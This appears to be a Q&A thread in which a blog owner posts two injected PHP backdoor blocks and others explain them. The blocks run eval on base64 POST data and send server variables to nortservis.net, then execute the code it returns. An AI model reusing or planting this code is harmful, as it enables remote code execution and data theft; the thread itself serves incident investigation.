# Investigating Drupalgeddon exploit used on a Wordpress blog

Tags: wordpress, reactjs, security, web, drupal

Google Safe Browsing recently detected malware on our Wordpress blog.
Later we found out someone successfully injected some of our php files with blocks of code. I am trying to understand the malware, access the damage, find out how to restore our system, and what does it mean for users that were affected.

**Questions:**

1. Is it malicious?
   -> Yes
2. What does it do? or what did it do to our users? 
   -> Remote Code Execution
3. How did a Drupal vulnerability affect out Wordpress blog?
   -> Wp-plugins???
4. What are the possible ways for code like this to be injected on a wp-blog?
5. Is this happening because of Drupalgeddon- [Internet security alert code: 055BCCAC9FEC](https://answers.microsoft.com/en-us/protect/forum/protect_defender-protect_scanning-windows_10/internet-security-alert-code-055bccac9fec/d6b7259c-38ed-44a4-bb50-e6efffbceac7)
6. Will a returning user of our site be affected even after we clean our servers because of the cookies set by this code.

**The two blocks of code that were used in the attack**

**First:**

```
if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
eval(base64_decode($_POST["cookies_p"]));
}

if(strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
    $patchedfv = "GHKASMVG";
}

if (isset($_REQUEST[fdgdfgvv]))
{
    if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
    {
        $patchedfv = "SDFDFSDF";
    }
}

if($patchedfv === "GHKASMVG")
{
    @ob_end_clean();
    die;
}

error_reporting(0);

if (!$kjdke_c)
{
    global $kjdke_c;
    $kjdke_c = 1;
    global $include_test;
    $include_test = 1;
    $bkljg = $_SERVER["HTTP_USER_AGENT"];
    $ghfju = array(
        "Google",
        "Slurp",
        "MSNBot",
        "ia_archiver",
        "Yandex",
        "Rambler",
        "bot",
        "spid",
        "Lynx",
        "PHP",
        "WordPress" . "integromedb",
        "SISTRIX",
        "Aggregator",
        "findlinks",
        "Xenu",
        "BacklinkCrawler",
        "Scheduler",
        "mod_pagespeed",
        "Index",
        "ahoo",
        "Tapatalk",
        "PubSub",
        "RSS",
        "WordPress"
    );
    if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
    {
    }
    else
    {
        foreach($_SERVER as $ndbv => $cbcd)
        {
            $data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
        }

        $context_jhkb = stream_context_create(array(
            http => array(
                timeout => 15,
                header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
                method => POST,
                content => "REM_REM=\'1\'" . $data_nfdh
            )
        ));
        $vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
        if ($vkfu)
        {
            @eval($vkfu);
        }
        else
        {
            ob_start();
            if (!@headers_sent())
            {
                @setcookie("condtions", "2", time() + 172800);
            }
            else
            {
                echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";
            };

        };

    }

}
```

**Second:**

```
if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
    eval(base64_decode($_POST["cookies_p"]));
}

if (strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
    $patchedfv = "GHKASMVG";
}

if (isset($_REQUEST[fdgdfgvv]))
{
    if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
    {
        $patchedfv = "SDFDFSDF";
    }
}

if ($patchedfv === "GHKASMVG")
{
    @ob_end_clean();
    die;
}

if (strpos($_SERVER["HTTP_USER_AGENT"], "Win") === false)
{
    $kjdke_c = 1;
}

error_reporting(0);

if (!$kjdke_c)
{
    global $kjdke_c;
    $kjdke_c = 1;
    global $include_test;
    $include_test = 1;
    $bkljg = $_SERVER["HTTP_USER_AGENT"];
    $ghfju = array(
        "Google",
        "Slurp",
        "MSNBot",
        "ia_archiver",
        "Yandex",
        "Rambler",
        "bot",
        "spid",
        "Lynx",
        "PHP",
        "WordPress" . "integromedb",
        "SISTRIX",
        "Aggregator",
        "findlinks",
        "Xenu",
        "BacklinkCrawler",
        "Scheduler",
        "mod_pagespeed",
        "Index",
        "ahoo",
        "Tapatalk",
        "PubSub",
        "RSS",
        "WordPress"
    );
    if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
    {
    }
    else
    {
        foreach($_SERVER as $ndbv => $cbcd)
        {
            $data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
        }

        $context_jhkb = stream_context_create(array(
            http => array(
                timeout => 15,
                header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
                method => POST,
                content => "REM_REM=\'1\'" . $data_nfdh
            )
        ));
        $vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
        if ($vkfu)
        {
            @eval($vkfu);
        }
        else
        {
            ob_start();
            if (!@headers_sent())
            {
                @setcookie("condtions", "2", time() + 172800);
            }
            else
            {
                echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";

            };

        };

    }

}
```

**Conclusions so far:**
Thanks  to @Alex Howansky it is certain that it's a malware at this point.And could have been used to perform any kind of attack(eg: the one above or random redirects to shady sites).But i am still trying to understand how our Wordpress blog was infected and how to prevent this form happening

**One More thing:**
Google detected this malware on our wordpress blog. Hosted at /blog. But google and other search engines are flagging the whole domain as a malware as a result users can't access our react app hosted at root domain. Is the whole domain compromised ? is our react app safe?

Comment: If Google warns you and you have injected code on your webpage then we can safely assume it's not something you want to keep.

Comment: @Andreas Thank you for your suggestion. We are not gonna keep this script on our site. We are currently trying to clean our wp-blog, look at the code access the damage, prevent this from ever happening again. Do you an ideas on how to make sure that our site is completely safe after this.

Comment: Also google detected this malware on our wordpress blog. Hosted at honeyuideapps.com/blog. But google and other search engines are flagging the whole domain as malware as a result users can't access our react app hosted at honeyguideapps.com.Is the whole domain compromised ? is our react app safe?

Answer (score 3):

> Is it malicious?

Yes. This allows a remote user to send arbitrary code to your server to be executed:

```
eval(base64_decode($_POST["cookies_p"]));
```

This downloads code and then executes it:

```
$vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
@eval($vkfu);
```

> what did it do to our users?

Impossible to say.

This appears to be a known exploit called [Drupalgeddon](https://www.drupal.org/sa-core-2018-002) which was discovered and patched many months ago. You need to keep your install up to date.

Comment: *Potentially* malicious, *definitely* a vulnerability. It would depend on 'what that code did' (haven't looked, don't care). That said, it's definitely *not* something I'd allow .. so if *your* coding team didn't add it .. and even if they did ..

Comment: Yeah i see it now. Thank you. What about the cookie its trying to set if its not doing the eval in the last if-else block.

Comment: The cookie is only set if the code pull fails, so I'd say it was a means for the attacker to determine if their command worked.

Comment: Note that it's entirely possible for other backdoors to have been placed on your system via this. Removing this code and patching Drupal will *not* guarantee you have a clean server.

Comment: @Alex Howansky you mention [Drupalgeddon] (https://www.drupal.org/sa-core-2018-002) is possible that this infected our wordpress blog? We migrated from drupal a year ago.

Comment: That's the alert that came up when I googled the MD5 fingerprint. Perhaps it's not related, perhaps it's been sitting there for a year. Might also be an attack against WP using the same code from DrupalGeddon.

Comment: Any idea what it is doing with `$ghfju = array(
  "Google",
  "Slurp",
  "MSNBot",
  "ia_archiver",
  "Yandex",
  "Rambler",
  "bot",
  "spid"...
 );`

Comment: Those are User Agent strings. If a request hits the site from a client that uses any of those strings, the code will skip all the shenanigans and leave the output unmolested. This prevents its finger prints from showing up in search engines.

Comment: Is it only targeting windows operating system with this `if (strpos($_SERVER["HTTP_USER_AGENT"], "Win") === false)`?

Comment: Note it checks for `=== false` which matches *not* containing `Win`... but then it does and inverted check with `if (!$kjdke_c)`... so who knows. It doesn't matter. You've been compromised, how this attack works is the least of your worries right now.

Comment: You are right. Do you have any possible suggestions on how to clean the server totally? you mentioned removing the code and patching Drupal will not guarantee it. I have tried removing the code and scanning all the files with wordFence.

Comment: The only way to be sure you've cleaned the server totally is to reformat it.